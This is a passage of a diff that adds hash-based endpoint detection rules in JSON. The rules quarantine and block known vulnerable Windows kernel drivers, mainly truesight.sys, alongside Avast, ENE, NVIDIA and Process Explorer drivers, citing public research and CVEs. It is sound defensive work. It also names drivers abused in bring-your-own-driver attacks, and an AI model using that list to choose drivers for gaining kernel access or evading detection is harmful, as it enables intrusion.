+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829696Z",
+ "creation_date": "2026-03-23T11:45:30.829698Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829704Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "06ca3298bf7b70f797198adc31108fe95126fb37b12021e3e00390f60bb7181b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2842e846-f175-5aa4-a969-032d3b8f4e04",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140094Z",
+ "creation_date": "2026-03-23T11:45:31.140096Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140102Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34246ad7d90163e21633a7f76bc9709332a1b67e3263151263fc9f5f853891f4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "284688e5-29cd-594b-bc06-976b650c452a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606438Z",
+ "creation_date": "2026-03-23T11:45:29.606440Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606446Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "703b4ec0a36c18af294f5db9e0acf73edec524515f75856bb8da7a98b4e26910",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "284b1cab-cbce-5dc2-9b80-1869174a4d2a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157548Z",
+ "creation_date": "2026-03-23T11:45:31.157550Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157557Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7154523cf44a211b4b39b7e24f37368e83a67ef90fdc1b9553e0d850f0d08509",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "284d0c81-9673-548d-8e49-58b9a7834e51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613012Z",
+ "creation_date": "2026-03-23T11:45:29.613014Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613019Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0ed869a98c4cc2fc84deacb91ab87ca7657f0aea3e1c23234263e99237712fb",
+ "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "285393c7-3974-5188-a0e0-4cd0b01b85d2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487594Z",
+ "creation_date": "2026-03-23T11:45:31.487596Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487602Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0154a13245c9b2ce43c31de3c78e49d3d9de3fac1bed848520aae9d423d822e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "285c71f4-484f-57f8-a139-754d50d9ab91",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473912Z",
+ "creation_date": "2026-03-23T11:45:31.473915Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473926Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47e95a501379d5f835eef82a9fd7ed0e80a04a7a780e9bac73830965a89d5302",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "286359cf-919a-5ac3-9a9d-55d98db458c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835789Z",
+ "creation_date": "2026-03-23T11:45:30.835791Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b04d79bf5f1038113278d0f22f0d4a262e1416b52e8983e25dd1a6c226a99e2c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "28706d2e-50b2-51b9-94ea-5def0c1f6a8b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144753Z",
+ "creation_date": "2026-03-23T11:45:31.144755Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144761Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "254c19c95c44c54d4bd33df6898245b44699a2121db520e621e9c140a358e8bb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2870aa4c-f10d-5a6e-9c10-645b843daf4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815986Z",
+ "creation_date": "2026-03-23T11:45:31.815990Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815998Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b047cd7bb68be8ddec660503d5b6f30f99b0091420a987cb6ff172b3fa6e4fd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2872703e-bc36-5ae0-8de2-78407291bb9b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486447Z",
+ "creation_date": "2026-03-23T11:45:31.486450Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486458Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea15838c7281eb1afb472e7ea8801b8f32232a661153754aa69dafd98f534953",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2884afd6-ebca-5d79-aee7-2932a94663d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822203Z",
+ "creation_date": "2026-03-23T11:45:31.822205Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822210Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82c86dccb438ae2f58d44fe34c5780fb02334ff0329868a28f55b85b18b1f47b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2886cab4-72f8-540c-bbe0-3c49982c9234",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970245Z",
+ "creation_date": "2026-03-23T11:45:29.970247Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970252Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "00716eab8a3277128fb5ea8b1ac863e4b81b40674f7c6eb0f201e96341fd87c9",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "289001a0-3ef1-55c0-880f-42c3c1d99321",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472378Z",
+ "creation_date": "2026-03-23T11:45:31.472381Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472390Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c2b90cc27a96098b59ae89939e6adc00a8fdd69a9b43a23730e50571fe68abb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "28963a63-7d3c-5bc5-9a23-5530a85da16a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156962Z",
+ "creation_date": "2026-03-23T11:45:31.156964Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156970Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c4de9d73720d02d54e0db5bd5bcaded5425bb73ef0886cfa8b74e48df921ee49",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "28a4b087-8491-517a-bd65-fcf74da2190e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146077Z",
+ "creation_date": "2026-03-23T11:45:31.146079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146084Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37e3631303ef170f071203b4577a998e7390e3bcacf23d9dc5fee7252353dbee",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "28a87c3f-d4af-53b9-81eb-73750a75640f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153890Z",
+ "creation_date": "2026-03-23T11:45:31.153892Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153897Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "163c5afcc5ef9d4561cb0ee04b85d0b8d2026423079c797484221a442194e687",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "28b03214-b2b3-5594-8709-4dc806d2e668",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968167Z",
+ "creation_date": "2026-03-23T11:45:29.968169Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968175Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50",
+ "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "28cadc33-4e01-5cc4-9b99-02bd8b3517f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156178Z",
+ "creation_date": "2026-03-23T11:45:31.156180Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156186Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8bf703ff0947ef595d5bbb1a7a424a52384c5b0e84e3fe0214409fdddb978464",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "28d1d35d-5151-5d28-b28f-48422d5f2365",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807641Z",
+ "creation_date": "2026-03-23T11:45:31.807643Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807649Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a44dd4e5c71952ee7939fcc946de0e9ccf9e63688145dbb42a0257bd4fb6a440",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "28dbf36c-5288-5f4d-b31a-267784752981",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618638Z",
+ "creation_date": "2026-03-23T11:45:29.618639Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618645Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9434a50e1a6252f23af362631a5576017cce3ef109d7fc93748de8bd46f9385",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "28f47e18-09f5-5def-8cd9-8269b4ea3304",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461441Z",
+ "creation_date": "2026-03-23T11:45:30.461445Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461453Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c8926e31be2d1355e542793af8ff9ccc4d1d60cae40c9564b2400dd4e1090bda",
+ "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "28f8596c-8777-5e2b-a3c6-d892c40ae168",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
